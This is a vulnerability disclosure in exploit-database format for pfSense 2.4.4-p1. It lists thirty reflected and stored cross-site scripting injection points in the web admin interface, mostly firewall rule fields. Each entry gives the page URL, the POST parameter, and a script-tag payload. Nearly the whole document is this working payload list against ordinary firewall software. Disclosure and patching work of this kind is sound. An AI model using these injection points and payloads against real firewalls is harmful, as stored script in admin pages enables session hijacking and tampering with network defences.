################################################################################################################################## # Exploit Title: pfSense 2.4.4-p1 | Cross-Site Scripting # Date: 28.01.2019 # Exploit Author: Ozer Goker # Vendor Homepage: https://www.pfsense.org # Software Link: https://frafiles.pfsense.org/mirror/downloads/pfSense-CE-2.4.4-RELEASE-p1-amd64.iso.gz # Version: 2.4.4-p1 ################################################################################################################################## Introduction pfSenseA(r) software is a free, open source customized distribution of FreeBSD specifically tailored for use as a firewall and router that is entirely managed via web interface. In addition to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution. ################################################################################# XSS details: Reflected & Stored ################################################################################# XSS1 | Reflected URL http://192.168.2.200/system_advanced_admin.php METHOD Post PARAMETER webguiproto PAYLOAD "><script>alert(1)</script> ################################################################################# XSS2 | Reflected URL http://192.168.2.200/interfaces_assign.php METHOD Post PARAMETER wan PAYLOAD "><script>alert(2)</script> ################################################################################# XSS3 | Stored URL http://192.168.2.200/firewall_rules_edit.php?if=FloatingRules METHOD Post PARAMETER dscp PAYLOAD "><script>alert(3)</script> ################################################################################# XSS4 | Stored URL http://192.168.2.200/firewall_rules_edit.php?if=FloatingRules METHOD Post PARAMETER tag PAYLOAD "><script>alert(4)</script> ################################################################################# XSS5 | Stored URL http://192.168.2.200/firewall_rules_edit.php?if=FloatingRules METHOD Post PARAMETER tagged PAYLOAD "><script>alert(5)</script> ################################################################################# XSS6 | Stored URL http://192.168.2.200/firewall_rules_edit.php?if=FloatingRules METHOD Post PARAMETER statetype PAYLOAD "><script>alert(6)</script> ################################################################################# XSS7 | Stored URL http://192.168.2.200/firewall_rules_edit.php?if=FloatingRules METHOD Post PARAMETER vlanprio PAYLOAD "><script>alert(7)</script> ################################################################################# XSS8 | Stored URL http://192.168.2.200/firewall_rules_edit.php?if=FloatingRules METHOD Post PARAMETER vlanprioset PAYLOAD "><script>alert(8)</script> ################################################################################# XSS9 | Stored URL http://192.168.2.200/firewall_rules_edit.php?if=FloatingRules METHOD Post PARAMETER dnpipe PAYLOAD "><script>alert(9)</script> ################################################################################# XSS10 | Stored URL http://192.168.2.200/firewall_rules_edit.php?if=FloatingRules METHOD Post PARAMETER defaultqueue PAYLOAD "><script>alert(10)</script> ################################################################################# XSS11 | Stored URL http://192.168.2.200/firewall_rules_edit.php?if=wan&after=-1 METHOD Post PARAMETER dscp PAYLOAD "><script>alert(11)</script> ################################################################################# XSS12 | Stored URL http://192.168.2.200/firewall_rules_edit.php?if=wan&after=-1 METHOD Post PARAMETER tag PAYLOAD "><script>alert(12)</script> ################################################################################# XSS13 | Stored URL http://192.168.2.200/firewall_rules_edit.php?if=wan&after=-1 METHOD Post PARAMETER tagged PAYLOAD "><script>alert(13)</script> ################################################################################# XSS14 | Stored URL http://192.168.2.200/firewall_rules_edit.php?if=wan&after=-1 METHOD Post PARAMETER statetype PAYLOAD "><script>alert(14)</script> ################################################################################# XSS15 | Stored URL http://192.168.2.200/firewall_rules_edit.php?if=wan&after=-1 METHOD Post PARAMETER vlanprio PAYLOAD "><script>alert(15)</script> ################################################################################# XSS16 | Stored URL http://192.168.2.200/firewall_rules_edit.php?if=wan&after=-1 METHOD Post PARAMETER vlanprioset PAYLOAD "><script>alert(16)</script> ################################################################################# XSS17 | Stored URL http://192.168.2.200/firewall_rules_edit.php?if=wan&after=-1 METHOD Post PARAMETER dnpipe PAYLOAD "><script>alert(17)</script> ################################################################################# XSS18 | Stored URL http://192.168.2.200/firewall_rules_edit.php?if=wan&after=-1 METHOD Post PARAMETER defaultqueue PAYLOAD "><script>alert(18)</script> ################################################################################# XSS19 | Stored URL http://192.168.2.200/firewall_rules_edit.php?if=lan METHOD Post PARAMETER dscp PAYLOAD "><script>alert(19)</script> ################################################################################# XSS20 | Stored URL http://192.168.2.200/firewall_rules_edit.php?if=lan METHOD Post PARAMETER tag PAYLOAD "><script>alert(20)</script> ################################################################################# XSS21 | Stored URL http://192.168.2.200/firewall_rules_edit.php?if=lan METHOD Post PARAMETER tagged PAYLOAD "><script>alert(21)</script> ################################################################################# XSS22 | Stored URL http://192.168.2.200/firewall_rules_edit.php?if=lan METHOD Post PARAMETER statetype PAYLOAD "><script>alert(22)</script> ################################################################################# XSS23 | Stored URL http://192.168.2.200/firewall_rules_edit.php?if=lan METHOD Post PARAMETER vlanprio PAYLOAD "><script>alert(23)</script> ################################################################################# XSS24 | Stored URL http://192.168.2.200/firewall_rules_edit.php?if=lan METHOD Post PARAMETER vlanprioset PAYLOAD "><script>alert(24)</script> ################################################################################# XSS25 | Stored URL http://192.168.2.200/firewall_rules_edit.php?if=lan METHOD Post PARAMETER dnpipe PAYLOAD "><script>alert(25)</script> ################################################################################# XSS26 | Stored URL http://192.168.2.200/firewall_rules_edit.php?if=lan METHOD Post PARAMETER defaultqueue PAYLOAD "><script>alert(26)</script> ################################################################################# XSS27 | Reflected URL http://192.168.2.200/firewall_shaper.php METHOD Post PARAMETER name PAYLOAD "><script>alert(27)</script> ################################################################################# XSS28 | Stored URL http://192.168.2.200/services_igmpproxy_edit.php METHOD Post PARAMETER address0 PAYLOAD "><script>alert(28)</script> ################################################################################# XSS29 | Stored URL http://192.168.2.200/services_ntpd_gps.php METHOD Post PARAMETER gpstype PAYLOAD "><script>alert(29)</script> ################################################################################# XSS30 | Reflected URL http://192.168.2.200/diag_traceroute.php METHOD Post PARAMETER host PAYLOAD "><script>alert(30)</script> #################################################################################